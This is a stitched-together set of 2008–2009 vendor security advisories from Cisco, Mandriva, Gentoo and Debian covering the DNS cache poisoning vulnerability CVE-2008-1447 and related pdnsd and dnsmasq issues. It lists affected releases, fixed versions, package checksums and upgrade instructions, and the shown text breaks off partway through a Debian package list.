Vulnerable; | 12.4(19a) | | 12.2XB | first fixed | | | | in 12.4 | 12.4(19b) | |------------+-------------+-------------| | | Vulnerable; | 12.4(19a) | | 12.2XC | first fixed | | | | in 12.4 | 12.4(19b) | |------------+-------------+-------------| | 12.2XD | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2XE | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2XF | Not | | | | Vulnerable | | |------------+-------------+-------------| | | Vulnerable; | 12.4(19a) | | 12.2XG | first fixed | | | | in 12.4 | 12.4(19b) | |------------+-------------+-------------| | 12.2XH | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2XI | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2XJ | Not | | | | Vulnerable | | |------------+-------------+-------------| | | Vulnerable; | 12.4(19a) | | 12.2XK | first fixed | | | | in 12.4 | 12.4(19b) | |------------+-------------+-------------| | | Vulnerable; | 12.4(19a) | | 12.2XL | first fixed | | | | in 12.4 | 12.4(19b) | |------------+-------------+-------------| | 12.2XM | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2XN | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2XNA | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2XO | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2XQ | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2XR | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2XS | Not | | | | Vulnerable | | |------------+-------------+-------------| | | Vulnerable; | 12.4(19a) | | 12.2XT | first fixed | | | | in 12.4 | 12.4(19b) | |------------+-------------+-------------| | | Vulnerable; | 12.4(19a) | | 12.2XU | first fixed | | | | in 12.4 | 12.4(19b) | |------------+-------------+-------------| | 12.2XV | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2XW | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2YA | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2YB | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2YC | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2YD | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2YE | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2YF | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2YG | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2YH | Not | | | | Vulnerable | | |------------+-------------+-------------| | | Vulnerable; | 12.4(19a) | | 12.2YJ | first fixed | | | | in 12.4 | 12.4(19b) | |------------+-------------+-------------| | 12.2YK | Not | | | | Vulnerable | | |------------+-------------+-------------| | | Vulnerable; | 12.4(19a) | | 12.2YL | first fixed | | | | in 12.4 | 12.4(19b) | |------------+-------------+-------------| | | Vulnerable; | 12.4(19a) | | 12.2YM | first fixed | | | | in 12.4 | 12.4(19b) | |------------+-------------+-------------| | | Vulnerable; | 12.4(19a) | | 12.2YN | first fixed | | | | in 12.4 | 12.4(19b) | |------------+-------------+-------------| | | Vulnerable; | 12.2(18) | | | migrate to | SXF15; | | 12.2YO | any release | Available | | | in 12.2SY | on | | | | 08-AUG-08 | |------------+-------------+-------------| | 12.2YP | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2YQ | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2YR | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2YS | Not | | | | Vulnerable | | |------------+-------------+-------------| | | Vulnerable; | 12.4(19a) | | 12.2YT | first fixed | | | | in 12.4 | 12.4(19b) | |------------+-------------+-------------| | | Vulnerable; | 12.4(19a) | | 12.2YU | first fixed | | | | in 12.4 | 12.4(19b) | |------------+-------------+-------------| | | Vulnerable; | 12.4(19a) | | 12.2YV | first fixed | | | | in 12.4 | 12.4(19b) | |------------+-------------+-------------| | 12.2YW | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2YX | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2YY | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2YZ | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2ZA | Not | | | | Vulnerable | | |------------+-------------+-------------| | | Vulnerable; | 12.4(19a) | | 12.2ZB | first fixed | | | | in 12.4 | 12.4(19b) | |------------+-------------+-------------| | 12.2ZC | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2ZD | Vulnerable; | | | | contact TAC | | |------------+-------------+-------------| | | Vulnerable; | 12.4(19a) | | 12.2ZE | first fixed | | | | in 12.4 | 12.4(19b) | |------------+-------------+-------------| | | Vulnerable; | 12.4(19a) | | 12.2ZF | first fixed | | | | in 12.4 | 12.4(19b) | |------------+-------------+-------------| | | | 12.4(19a) | | | | | | | Vulnerable; | 12.4(19b) | | 12.2ZG | first fixed | | | | in 12.4T | 12.4(20)T; | | | | Available | | | | on | | | | 11-JUL-08 | |------------+-------------+-------------| | | | 12.4(19a) | | | | | | | Vulnerable; | 12.4(19b) | | 12.2ZH | first fixed | | | | in 12.4 | 12.4(20)T; | | | | Available | | | | on | | | | 11-JUL-08 | |------------+-------------+-------------| | | Vulnerable; | 12.4(19a) | | 12.2ZJ | first fixed | | | | in 12.4 | 12.4(19b) | |------------+-------------+-------------| | | | 12.4(19a) | | | | | | | Vulnerable; | 12.4(19b) | | 12.2ZL | first fixed | | | | in 12.4 | 12.4(20)T; | | | | Available | | | | on | | | | 11-JUL-08 | |------------+-------------+-------------| | 12.2ZP | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2ZU | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2ZY | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2ZYA | Not | | | | Vulnerable | | |------------+-------------+-------------| | Affected | First Fixed | Recommended | | 12.3-Based | Release | Release | | Releases | | | |------------+-------------+-------------| | | Vulnerable; | 12.4(19a) | | 12.3 | first fixed | | | | in 12.4 | 12.4(19b) | |------------+-------------+-------------| | | Vulnerable; | 12.4(19a) | | 12.3B | first fixed | | | | in 12.4 | 12.4(19b) | |------------+-------------+-------------| | 12.3BC | Not | | | | Vulnerable | | |------------+-------------+-------------| | | Vulnerable; | 12.4(19a) | | 12.3BW | first fixed | | | | in 12.4 | 12.4(19b) | |------------+-------------+-------------| | 12.3EU | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.3JA | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.3JEA | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.3JEB | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.3JEC | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.3JK | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.3JL | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.3JX | Not | | | | Vulnerable | | |------------+-------------+-------------| | | Vulnerable; | 12.4(19a) | | 12.3T | first fixed | | | | in 12.4 | 12.4(19b) | |------------+-------------+-------------| | 12.3TPC | Vulnerable; | | | | contact TAC | | |------------+-------------+-------------| | 12.3VA | Vulnerable; | | | | contact TAC | | |------------+-------------+-------------| | | | 12.4(19a) | | | | | | | Vulnerable; | 12.4(19b) | | 12.3XA | first fixed | | | | in 12.4 | 12.4(20)T; | | | | Available | | | | on | | | | 11-JUL-08 | |------------+-------------+-------------| | | Vulnerable; | 12.4(19a) | | 12.3XB | first fixed | | | | in 12.4 | 12.4(19b) | |------------+-------------+-------------| | | | 12.4(19a) | | | | | | | Vulnerable; | 12.4(19b) | | 12.3XC | first fixed | | | | in 12.4 | 12.4(20)T; | | | | Available | | | | on | | | | 11-JUL-08 | |------------+-------------+-------------| | | Vulnerable; | 12.4(19a) | | 12.3XD | first fixed | | | | in 12.4 | 12.4(19b) | |------------+-------------+-------------| | | | 12.4(19a) | | | | | | | Vulnerable; | 12.4(19b) | | 12.3XE | first fixed | | | | in 12.4 | 12.4(20)T; | | | | Available | | | | on | | | | 11-JUL-08 | |------------+-------------+-------------| | | Vulnerable; | 12.4(19a) | | 12.3XF | first fixed | | | | in 12.4 | 12.4(19b) | |------------+-------------+-------------| | | | 12.4(19a) | | | | | | | Vulnerable; | 12.4(19b) | | 12.3XG | first fixed | | | | in 12.4T | 12.4(20)T; | | | | Available | | | | on | | | | 11-JUL-08 | |------------+-------------+-------------| | | Vulnerable; | 12.4(19a) | | 12.3XH | first fixed | | | | in 12.4 | 12.4(19b) | |------------+-------------+-------------| | 12.3XI | Vulnerable; | | | | contact TAC | | |------------+-------------+-------------| | | | 12.3(14) | | | | YX12 | | | Vulnerable; | | | 12.3XJ | first fixed | 12.4(20)T; | | | in 12.3YX | Available | | | | on | | | | 11-JUL-08 | |------------+-------------+-------------| | | Vulnerable; | 12.4(19a) | | 12.3XK | first fixed | | | | in 12.4 | 12.4(19b) | |------------+-------------+-------------| | | Vulnerable; | 12.4(19a) | | 12.3XQ | first fixed | | | | in 12.4 | 12.4(19b) | |------------+-------------+-------------| | | | 12.4(19a) | | | | | | | Vulnerable; | 12.4(19b) | | 12.3XR | first fixed | | | | in 12.4 | 12.4(20)T; | | | | Available | | | | on | | | | 11-JUL-08 | |------------+-------------+-------------| | | Vulnerable; | 12.4(19a) | | 12.3XS | first fixed | | | | in 12.4 | 12.4(19b) | |------------+-------------+-------------| | 12.3XU | Not | | | | Vulnerable | | |------------+-------------+-------------| | | | 12.3(14) | | | | YX12 | | | Vulnerable; | | | 12.3XW | first fixed | 12.4(20)T; | | | in 12.3YX | Available | | | | on | | | | 11-JUL-08 | |------------+-------------+-------------| | 12.3XY | Not | | | | Vulnerable | | |------------+-------------+-------------| | | | 12.4(19a) | | | | | | | Vulnerable; | 12.4(19b) | | 12.3YA | first fixed | | | | in 12.4 | 12.4(20)T; | | | | Available | | | | on | | | | 11-JUL-08 | |------------+-------------+-------------| | | Vulnerable; | 12.4(20)T; | | 12.3YD | first fixed | Available | | | in 12.4T | on | | | | 11-JUL-08 | |------------+-------------+-------------| | | | 12.3(14) | | | | YX12 | | | Vulnerable; | | | 12.3YF | first fixed | 12.4(20)T; | | | in 12.3YX | Available | | | | on | | | | 11-JUL-08 | |------------+-------------+-------------| | | Vulnerable; | 12.4(20)T; | | 12.3YG | first fixed | Available | | | in 12.4T | on | | | | 11-JUL-08 | |------------+-------------+-------------| | | Vulnerable; | 12.4(20)T; | | 12.3YH | first fixed | Available | | | in 12.4T | on | | | | 11-JUL-08 | |------------+-------------+-------------| | | Vulnerable; | 12.4(20)T; | | 12.3YI | first fixed | Available | | | in 12.4T | on | | | | 11-JUL-08 | |------------+-------------+-------------| | 12.3YJ | Not | | | | Vulnerable | | |------------+-------------+-------------| | | Vulnerable; | 12.4(20)T; | | 12.3YK | first fixed | Available | | | in 12.4T | on | | | | 11-JUL-08 | |------------+-------------+-------------| | | Releases | | | | prior to | | | | 12.3(14) | | | | YM12 are | | | | vulnerable, | 12.3(14) | | 12.3YM | release | YM12 | | | 12.3(14) | | | | YM12 and | | | | later are | | | | not | | | | vulnerable; | | |------------+-------------+-------------| | 12.3YQ | Not | | | | Vulnerable | | |------------+-------------+-------------| | | Vulnerable; | 12.4(20)T; | | 12.3YS | first fixed | Available | | | in 12.4T | on | | | | 11-JUL-08 | |------------+-------------+-------------| | | Vulnerable; | 12.4(20)T; | | 12.3YT | first fixed | Available | | | in 12.4T | on | | | | 11-JUL-08 | |------------+-------------+-------------| | | Vulnerable; | | | 12.3YU | first fixed | | | | in 12.4XB | | |------------+-------------+-------------| | 12.3YX | 12.3(14) | 12.3(14) | | | YX12 | YX12 | |------------+-------------+-------------| | 12.3YZ | Vulnerable; | | | | contact TAC | | |------------+-------------+-------------| | Affected | First Fixed | Recommended | | 12.4-Based | Release | Release | | Releases | | | |------------+-------------+-------------| | | 12.4(18b) | | | | | | | | 12.4(19a) | 12.4(19a) | | 12.4 | | | | | 12.4(19b) | 12.4(19b) | | | | | | | 12.4(21) | | |------------+-------------+-------------| | 12.4JA | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.4JK | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.4JMA | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.4JMB | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.4JMC | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.4JX | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.4MD | 12.4(15)MD | 12.4(15)MD | |------------+-------------+-------------| | 12.4MR | 12.4(19)MR | 12.4(19)MR | |------------+-------------+-------------| | 12.4SW | Vulnerable; | | | | contact TAC | | |------------+-------------+-------------| | | 12.4(15)T6 | | | | | 12.4(20)T; | | 12.4T | 12.4(20)T; | Available | | | Available | on | | | on | 11-JUL-08 | | | 11-JUL-08 | | |------------+-------------+-------------| | | Vulnerable; | 12.4(20)T; | | 12.4XA | first fixed | Available | | | in 12.4T | on | | | | 11-JUL-08 | |------------+-------------+-------------| | 12.4XB | 12.4(2)XB10 | | |------------+-------------+-------------| | 12.4XC | Vulnerable; | | | | contact TAC | | |------------+-------------+-------------| | | 12.4(4) | 12.4(20)T; | | | XD11; | Available | | 12.4XD | Available | on | | | on | 11-JUL-08 | | | 31-JUL-08 | | |------------+-------------+-------------| | | Vulnerable; | 12.4(20)T; | | 12.4XE | first fixed | Available | | | in 12.4T | on | | | | 11-JUL-08 | |------------+-------------+-------------| | 12.4XF | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.4XG | Not | | | | Vulnerable | | |------------+-------------+-------------| | | Vulnerable; | 12.4(20)T; | | 12.4XJ | first fixed | Available | | | in 12.4T | on | | | | 11-JUL-08 | |------------+-------------+-------------| | 12.4XK | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.4XL | 12.4(15)XL2 | 12.4(15)XL2 | |------------+-------------+-------------| | 12.4XM | 12.4(15)XM1 | 12.4(15)XM1 | |------------+-------------+-------------| | 12.4XN | Vulnerable; | | | | contact TAC | | |------------+-------------+-------------| | 12.4XQ | Vulnerable; | | | | contact TAC | | |------------+-------------+-------------| | 12.4XT | Vulnerable; | | | | contact TAC | | |------------+-------------+-------------| | 12.4XV | Vulnerable; | | | | contact TAC | | |------------+-------------+-------------| | 12.4XW | 12.4(11)XW8 | 12.4(11)XW6 | |------------+-------------+-------------| | 12.4XY | 12.4(15)XY3 | | |------------+-------------+-------------| | | Vulnerable; | 12.4(20)T; | | 12.4XZ | first fixed | Available | | | in 12.4T | on | | | | 11-JUL-08 | +----------------------------------------+

    Cisco Network Registrar +----------------------

    +---------------------------------------+ | Affected | | | Release | First Fixed Release | | Train | | |--------------+------------------------| | 6.1.x | Contact TAC | |--------------+------------------------| | | 6.3.1.1 patch; | | 6.3.x | available mid-July | | | 2008 | |--------------+------------------------| | 7.0.x | 7.0.1; available in | | | mid-July 2008 | +---------------------------------------+

    Cisco Network Registrar software is available for download at:

    http://www.cisco.com/pcgi-bin/Software/Tablebuild/tablebuild.pl/nr-eval

    Cisco Application and Content Networking System +----------------------------------------------

    This issue is fixed in version 5.5.11 of Cisco ACNS software. This release will be available for download from www.cisco.com in late July 2008.

    Cisco ACNS 5.5 software is available for download at:

    http://www.cisco.com/pcgi-bin/tablebuild.pl/acns55

    Workarounds

    There are no workarounds.

    Additional information about identification and mitigation of attacks against DNS is in the Cisco Applied Intelligence white paper "DNS Best Practices, Network Protections, and Attack Identification," available at http://www.cisco.com/web/about/security/intelligence/dns-bcp.html.

    Obtaining Fixed Software

    Cisco has released free software updates that address these vulnerabilities. Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment.

    Customers may only install and expect support for the feature sets they have purchased. By installing, downloading, accessing or otherwise using such software upgrades, customers agree to be bound by the terms of Cisco's software license terms found at http://www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html, or as otherwise set forth at Cisco.com Downloads at http://www.cisco.com/public/sw-center/sw-usingswc.shtml.

    Do not contact psirt@cisco.com or security-alert@cisco.com for software upgrades.

    Customers with Service Contracts +-------------------------------

    Customers with contracts should obtain upgraded software through their regular update channels. For most customers, this means that upgrades should be obtained through the Software Center on Cisco's worldwide website at http://www.cisco.com.

    Customers using Third Party Support Organizations +------------------------------------------------

    Customers whose Cisco products are provided or maintained through prior or existing agreements with third-party support organizations, such as Cisco Partners, authorized resellers, or service providers should contact that support organization for guidance and assistance with the appropriate course of action in regards to this advisory.

    The effectiveness of any workaround or fix is dependent on specific customer situations, such as product mix, network topology, traffic behavior, and organizational mission. Due to the variety of affected products and releases, customers should consult with their service provider or support organization to ensure any applied workaround or fix is the most appropriate for use in the intended network before it is deployed.

    Customers without Service Contracts +----------------------------------

    Customers who purchase direct from Cisco but do not hold a Cisco service contract, and customers who purchase through third-party vendors but are unsuccessful in obtaining fixed software through their point of sale should acquire upgrades by contacting the Cisco Technical Assistance Center (TAC). TAC contacts are as follows.

    • +1 800 553 2447 (toll free from within North America)
    • +1 408 526 7209 (toll call from anywhere in the world)
    • e-mail: tac@cisco.com

    Customers should have their product serial number available and be prepared to give the URL of this notice as evidence of entitlement to a free upgrade. Free upgrades for non-contract customers must be requested through the TAC.

    Refer to http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml for additional TAC contact information, including localized telephone numbers, and instructions and e-mail addresses for use in various languages.

    Exploitation and Public Announcements

    The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability described in this advisory. Cisco would like to thank Dan Kaminsky for notifying vendors about his findings.

    Note that vulnerability information for Cisco IOS Software is being provided in this advisory outside of the announced publication schedule for Cisco IOS Software described at http://www.cisco.com/go/psirt due to industry-wide disclosure of the vulnerability.

    Status of this Notice: FINAL

    THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME.

    A stand-alone copy or Paraphrase of the text of this document that omits the distribution URL in the following section is an uncontrolled copy, and may lack important information or contain factual errors.

    Distribution

    This advisory is posted on Cisco's worldwide website at

    http://www.cisco.com/warp/public/707/cisco-sa-20080708-dns.shtml

    In addition to worldwide web posting, a text version of this notice is clear-signed with the Cisco PSIRT PGP key and is posted to the following e-mail and Usenet news recipients.

    • cust-security-announce@cisco.com
    • first-teams@first.org
    • bugtraq@securityfocus.com
    • vulnwatch@vulnwatch.org
    • cisco@spot.colorado.edu
    • cisco-nsp@puck.nether.net
    • full-disclosure@lists.grok.org.uk
    • comp.dcom.sys.cisco@newsgate.cisco.com

    Future updates of this advisory, if any, will be placed on Cisco's worldwide website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the above URL for any updates.

    Revision History

    +-----------------------------------------------------------+ | Revision 1.0 | 2008-July-08 | Initial public release | +-----------------------------------------------------------+

    Cisco Security Procedures

    Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's worldwide website at http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html. This includes instructions for press inquiries regarding Cisco security notices. All Cisco security advisories are available at http://www.cisco.com/go/psirt.

    +-------------------------------------------------------------------- Copyright 2007-2008 Cisco Systems, Inc. All rights reserved. +--------------------------------------------------------------------

    Updated: Jul 08, 2008 Document ID: 107064

    +--------------------------------------------------------------------

    -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux)

    iEYEARECAAYFAkhztUIACgkQ86n/Gc8U/uCAgACfVRRoJO4w4defnpwbNlfgBm4t 2SMAnjKCKECHtsjN9umqqPrPd2DW4IcC =XGZw -----END PGP SIGNATURE----- . This could be used to misdirect users and services; i.e.

    This update provides the latest stable BIND releases for all platforms except Corporate Server/Desktop 3.0 and MNF2, which have been patched to correct the issue.


    References:

    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447


    Updated Packages:

    Mandriva Linux 2007.1: 73cc24fc9586b7ab290d755012c16a79 2007.1/i586/bind-9.4.2-0.1mdv2007.1.i586.rpm 70867c50cfd64b4406aa002d627d740b 2007.1/i586/bind-devel-9.4.2-0.1mdv2007.1.i586.rpm 3603e9d9115466753397a1f472011703 2007.1/i586/bind-utils-9.4.2-0.1mdv2007.1.i586.rpm cf5e4100ecb21a4eb603831e5a6ec23d 2007.1/SRPMS/bind-9.4.2-0.1mdv2007.1.src.rpm

    Mandriva Linux 2007.1/X86_64: 4eb7ce0984d3ce3befff667392e3bf3e 2007.1/x86_64/bind-9.4.2-0.1mdv2007.1.x86_64.rpm d7b9a9e7d4c52a5b0c54f59ca20bf2d5 2007.1/x86_64/bind-devel-9.4.2-0.1mdv2007.1.x86_64.rpm c5c66c9609615029d2f07f7b09a63118 2007.1/x86_64/bind-utils-9.4.2-0.1mdv2007.1.x86_64.rpm cf5e4100ecb21a4eb603831e5a6ec23d 2007.1/SRPMS/bind-9.4.2-0.1mdv2007.1.src.rpm

    Mandriva Linux 2008.0: 52dfe3970fcd9495b2bb9379a9312b25 2008.0/i586/bind-9.4.2-1mdv2008.0.i586.rpm 97d20d35b6814aa2f9fab549ca6237c0 2008.0/i586/bind-devel-9.4.2-1mdv2008.0.i586.rpm 87a7bb3dd25abd8cd882a8f2fdc2398e 2008.0/i586/bind-utils-9.4.2-1mdv2008.0.i586.rpm da4444a8074e6ede39dfa557fb258db7 2008.0/SRPMS/bind-9.4.2-1mdv2008.0.src.rpm

    Mandriva Linux 2008.0/X86_64: b9d0337363bc1e2b14505f25d4ee5f99 2008.0/x86_64/bind-9.4.2-1mdv2008.0.x86_64.rpm 9b75e2a96784c00c2912bc3bf333d089 2008.0/x86_64/bind-devel-9.4.2-1mdv2008.0.x86_64.rpm 0a593b090d9e6bda3666e234056e19ba 2008.0/x86_64/bind-utils-9.4.2-1mdv2008.0.x86_64.rpm da4444a8074e6ede39dfa557fb258db7 2008.0/SRPMS/bind-9.4.2-1mdv2008.0.src.rpm

    Mandriva Linux 2008.1: 2534ef007262d4ea2d219bab0190466c 2008.1/i586/bind-9.5.0-3mdv2008.1.i586.rpm c3feee5d05aa3aee14cd70a2d295d0b1 2008.1/i586/bind-devel-9.5.0-3mdv2008.1.i586.rpm f306c06665b723a2530258e6d1dbdae2 2008.1/i586/bind-doc-9.5.0-3mdv2008.1.i586.rpm 967ef80628f92160930bc3a3827a216e 2008.1/i586/bind-utils-9.5.0-3mdv2008.1.i586.rpm 70fc7a7964944a2926979710c5148ed1 2008.1/SRPMS/bind-9.5.0-3mdv2008.1.src.rpm

    Mandriva Linux 2008.1/X86_64: 3f4d96d7a7f913c141e1f63cdc7e7336 2008.1/x86_64/bind-9.5.0-3mdv2008.1.x86_64.rpm 420db658366763686198f41394aa72b3 2008.1/x86_64/bind-devel-9.5.0-3mdv2008.1.x86_64.rpm 6f3674f68311494c5a9ff0dbce831e82 2008.1/x86_64/bind-doc-9.5.0-3mdv2008.1.x86_64.rpm 4294b3a086b89bf53c5c967c17962447 2008.1/x86_64/bind-utils-9.5.0-3mdv2008.1.x86_64.rpm 70fc7a7964944a2926979710c5148ed1 2008.1/SRPMS/bind-9.5.0-3mdv2008.1.src.rpm

    Corporate 3.0: de2a4372d1c25d73f343c9fcb044c9dd corporate/3.0/i586/bind-9.2.3-6.5.C30mdk.i586.rpm 1f24f6dbdb6c02e21cbbef99555049cb corporate/3.0/i586/bind-devel-9.2.3-6.5.C30mdk.i586.rpm 00405b98290d5a41f226081baa57e18d corporate/3.0/i586/bind-utils-9.2.3-6.5.C30mdk.i586.rpm 6a237dc290f4f7c463b1996e6a4a4515 corporate/3.0/SRPMS/bind-9.2.3-6.5.C30mdk.src.rpm

    Corporate 3.0/X86_64: 628162f3d6a414828d2231fefc46842b corporate/3.0/x86_64/bind-9.2.3-6.5.C30mdk.x86_64.rpm dd29ff31a9cffcc1b20fd045869d7013 corporate/3.0/x86_64/bind-devel-9.2.3-6.5.C30mdk.x86_64.rpm c475c1a4d048e04da1fc27dcbb17c3f3 corporate/3.0/x86_64/bind-utils-9.2.3-6.5.C30mdk.x86_64.rpm 6a237dc290f4f7c463b1996e6a4a4515 corporate/3.0/SRPMS/bind-9.2.3-6.5.C30mdk.src.rpm

    Corporate 4.0: 271ead204904be302d197cd542f5ae23 corporate/4.0/i586/bind-9.3.5-0.4.20060mlcs4.i586.rpm 42413dcc1cf053e735216f767eff4e5d corporate/4.0/i586/bind-devel-9.3.5-0.4.20060mlcs4.i586.rpm 0201afe493a41e1deedc9bf7e9725f4a corporate/4.0/i586/bind-utils-9.3.5-0.4.20060mlcs4.i586.rpm 86bc0cdc9ed1b959b6f56e0660268f2e corporate/4.0/SRPMS/bind-9.3.5-0.4.20060mlcs4.src.rpm

    Corporate 4.0/X86_64: b1a18a7d0578dab7bd825eda6c682b3d corporate/4.0/x86_64/bind-9.3.5-0.4.20060mlcs4.x86_64.rpm 6a2ebd550feb9147058de05b1a1ef04d corporate/4.0/x86_64/bind-devel-9.3.5-0.4.20060mlcs4.x86_64.rpm 670a1b934ce4974b8505018ab69ade0b corporate/4.0/x86_64/bind-utils-9.3.5-0.4.20060mlcs4.x86_64.rpm 86bc0cdc9ed1b959b6f56e0660268f2e corporate/4.0/SRPMS/bind-9.3.5-0.4.20060mlcs4.src.rpm

    Multi Network Firewall 2.0: 5b694c24cc2092e38f531dbfdd5c9d41 mnf/2.0/i586/bind-9.2.3-6.5.C30mdk.i586.rpm c08bc805027059c47bed32215f17eacb mnf/2.0/i586/bind-utils-9.2.3-6.5.C30mdk.i586.rpm 39225289516498e1b071c5059306f2b9 mnf/2.0/SRPMS/bind-9.2.3-6.5.C30mdk.src.rpm


    To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

    All packages are signed by Mandriva for security. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200901-03


                                            http://security.gentoo.org/
    

    Severity: Normal Title: pdnsd: Denial of Service and cache poisoning Date: January 11, 2009 Bugs: #231285 ID: 200901-03


    Synopsis

    Two errors in pdnsd allow for Denial of Service and cache poisoning.

    Affected packages

    -------------------------------------------------------------------
     Package        /  Vulnerable  /                        Unaffected
    -------------------------------------------------------------------
    

    1 net-dns/pdnsd < 1.2.7 >= 1.2.7

    Description

    Two issues have been reported in pdnsd:

    • The p_exec_query() function in src/dns_query.c does not properly handle many entries in the answer section of a DNS reply, related to a "dangling pointer bug" (CVE-2008-4194). The first issue can be exploited by enticing pdnsd to send a query to a malicious DNS server, or using the port randomization weakness, and might lead to a Denial of Service.

    Workaround

    Port randomization can be enabled by setting the "query_port_start" option to 1024 which would resolve the CVE-2008-1447 issue.

    Resolution

    All pdnsd users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=net-dns/pdnsd-1.2.7"
    

    References

    [ 1 ] CVE-2008-1447 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447 [ 2 ] CVE-2008-4194 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4194

    Availability

    This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

    http://security.gentoo.org/glsa/glsa-200901-03.xml

    Concerns?

    Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org.

    License

    Copyright 2009 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

    The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

    http://creativecommons.org/licenses/by-sa/2.5 . Among other things, successful attacks can lead to misdirected web traffic and email rerouting.

    This update changes Debian's dnsmasq packages to implement the recommended countermeasure: UDP query source port randomization. This change increases the size of the space from which an attacker has to guess values in a backwards-compatible fashion and makes successful attacks significantly more difficult.

    This update also switches the random number generator to Dan Bernstein's SURF.

    For the stable distribution (etch), this problem has been fixed in version 2.35-1+etch4. Packages for alpha will be provided later.

    For the unstable distribution (sid), this problem has been fixed in version 2.43-1.

    We recommend that you upgrade your dnsmasq package.

    Upgrade instructions


    wget url will fetch the file for you dpkg -i file.deb will install the referenced file.

    If you are using the apt-get package manager, use the line for sources.list as given below:

    apt-get update will update the internal database apt-get upgrade will install corrected packages

    You may use an automated update by adding the resources from the footer to the proper configuration.

    Debian GNU/Linux 4.0 alias etch


    Stable updates are available for amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

    Source archives:

    http://security.debian.org/pool/updates/main/d/dnsmasq/dnsmasq_2.35-1+etch4.dsc Size/MD5 checksum: 596 3834461c89e55467b4b65ed4ac209e81 http://security.debian.org/pool/updates/main/d/dnsmasq/dnsmasq_2.35.orig.tar.gz Size/MD5 checksum: 252901 ad1fafeaf3442685cfe16613e0f8b777 http://security.debian.org/pool/updates/main/d/dnsmasq/dnsmasq_2.35-1+etch4.diff.gz Size/MD5 checksum: 19202 4ced7768f49198bd43bbbd24f2a3d3e4

    amd64 architecture (AMD x86_64 (AMD64))

    http://security.debian.org/pool/updates/main/d/dnsmasq/dnsmasq_2.35-1+etch4_amd64.deb Size/MD5 checksum: 188278 8fb55f694db9fdfccaa86d134e937777

    arm architecture (ARM)

    http://security.debian.org/pool/updates/main/d/dnsmasq/dnsmasq_2.35-1+etch4_arm.deb Size/MD5 checksum: 181746 4caf23f31de937b817e12ade7d132eac

    hppa architecture (HP PA RISC)

    http://security.debian.org/pool/updates/main/d/dnsmasq/dnsmasq_2.35-1+etch4_hppa.deb Size/MD5 checksum: 190490 66730e785683655b058d11aa70346be4

    i386 architecture (Intel ia32)

